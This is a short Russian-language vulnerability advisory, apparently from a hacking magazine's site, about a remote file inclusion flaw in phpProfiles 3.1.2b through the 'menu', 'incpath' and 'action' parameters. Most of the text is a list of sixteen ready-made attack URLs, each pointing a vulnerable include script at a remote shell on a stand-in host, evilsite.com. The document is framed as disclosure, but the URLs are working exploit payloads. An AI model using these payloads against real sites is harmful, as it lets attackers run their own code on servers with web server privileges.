Хакер #305. Многошаговые SQL-инъекции
Программа: phpProfiles 3.1.2b
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "menu", "incpath", "action" множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://[target]/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php
http://[target]/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php
http://[target]/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php?
http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?